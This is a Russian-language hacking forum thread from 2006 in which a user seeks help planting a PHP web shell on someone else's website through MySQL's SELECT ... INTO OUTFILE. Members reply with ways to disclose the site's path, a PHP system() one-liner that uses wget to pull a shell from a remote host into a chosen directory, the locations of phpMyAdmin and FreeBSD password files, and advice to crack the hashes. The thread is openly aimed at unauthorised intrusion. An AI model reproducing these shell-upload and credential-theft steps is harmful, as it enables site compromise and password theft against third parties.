Помогите залить шелл

Discussion in 'PHP' started by Lya--Lya, 3 Oct 2006.

  1. Lya--Lya

    Lya--Lya New Member

    Joined:
    3 Oct 2006
    Messages:
    15
    Likes Received:
    1
    Reputations:
    1
    Есть проблема заливки шелла на один сайт.
    Краткая предистрия....
    Есть доступ к mysql от туда можно командой " 'SELECT 'злой пхп шелл' FROM таблица WHERE id=строка
    into outfile 'путь к файлу' " загрузить данные с таблици в файл скажем /USR/LOCAL/путь где лежит наш сайт/myevilshell.php

    и собственно сама проблема: Я нигде немогу узнать полный путь к директории сайта....

    Опытные и знающие люди подскажите помогите что делать.


    P.S.- подгрузить файл httpd.conf в таблицу мускула из апача прав нехватило
     
  2. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    а там есть какие нить форумы или чаты, можно попробовать через них раскрыть полный путь
     
    2 people like this.
  3. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    попробуй поискать какие либо баги. все намного было бы легче если была бы не слепая скуль..
     
  4. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    Тебе нужно найти только багу а то ничего не сможешь сделать
     
  5. Lya--Lya

    Lya--Lya New Member

    Joined:
    3 Oct 2006
    Messages:
    15
    Likes Received:
    1
    Reputations:
    1
    Форумов и чатов там нет.
    а багу нашел только одну

    Warning: require(DB.php) [function.require]: failed to open stream: No such file or directory in /home/http/htdocs/library/includes/config.php on line 2

    Fatal error: require() [function.require]: Failed opening required 'DB.php' (include_path='.:/usr/local/include/php/include/libs') in /home/http/htdocs/library/includes/config.php on line 2

    может кто скажет чем мне это сможет помочь...??
     
  6. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Попробуй загрузи в /home/http/htdocs/library/includes/ авось прокатит.

    Ну или в /home/http/htdocs/ или в /home/http/htdocs/library/ .
     
    #6 Qwazar, 4 Oct 2006
    Last edited: 4 Oct 2006
  7. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    имхо /home/http/htdocs/ ..
     
  8. Lya--Lya

    Lya--Lya New Member

    Joined:
    3 Oct 2006
    Messages:
    15
    Likes Received:
    1
    Reputations:
    1
    Метод научного тыка... перепробовал.... заливал куда мог.... но всеравно не судьба. Может кто знает какойнить скульный запрос который покажет где путь лежит PhpMyadmin ???
    тогда можно просто залить в дир майадмина...
     
  9. Lya--Lya

    Lya--Lya New Member

    Joined:
    3 Oct 2006
    Messages:
    15
    Likes Received:
    1
    Reputations:
    1
    Помогите... выложите пожалуйста ПХП скрипт который делает wget
    ато уже сил нет пререписывать символы в шеле чтоб его мускул прохавал нормально....
     
  10. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    <?system("wget http://site.com/shell.php");?>

    ))
     
  11. Lya--Lya

    Lya--Lya New Member

    Joined:
    3 Oct 2006
    Messages:
    15
    Likes Received:
    1
    Reputations:
    1
    Спасибки...
     
  12. Lya--Lya

    Lya--Lya New Member

    Joined:
    3 Oct 2006
    Messages:
    15
    Likes Received:
    1
    Reputations:
    1
    А, как что б загрул в другую директорию... ???
     
  13. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    <?system("wget http://site.com/shell.php -O /директори/название_файла.php");?>
     
  14. r0

    r0 Elder - Старейшина

    Joined:
    17 Jul 2005
    Messages:
    450
    Likes Received:
    149
    Reputations:
    147
    Загрузи и скопируй
     
  15. Lya--Lya

    Lya--Lya New Member

    Joined:
    3 Oct 2006
    Messages:
    15
    Likes Received:
    1
    Reputations:
    1
    Подскажите кто знает где хранятся пароли на phpmyadmin если auth_type http
     
    #15 Lya--Lya, 11 Oct 2006
    Last edited: 11 Oct 2006
  16. EXSlim

    EXSlim Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    73
    Likes Received:
    20
    Reputations:
    18
    config.inc.php
     
  17. Lya--Lya

    Lya--Lya New Member

    Joined:
    3 Oct 2006
    Messages:
    15
    Likes Received:
    1
    Reputations:
    1
    Какие файлы нужно просмотреть во FreeBSD для того что б увидеть пароли...
    etc/passwd пароли закрыты звездочкой ????
     
  18. SMiX

    SMiX Elder - Старейшина

    Joined:
    25 Jul 2005
    Messages:
    227
    Likes Received:
    55
    Reputations:
    29
    /etc/master.passwd . Но и там они не в открытом виде :)
     
  19. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    Lya--Lya, для рассшифровки юзай Join The Ripper
     
  20. Lya--Lya

    Lya--Lya New Member

    Joined:
    3 Oct 2006
    Messages:
    15
    Likes Received:
    1
    Reputations:
    1
    /etc/master.passwd грузить в таблицу не хочет... говорит что нет такого файла...
    Может еще чегото есть где могут быть пароли...???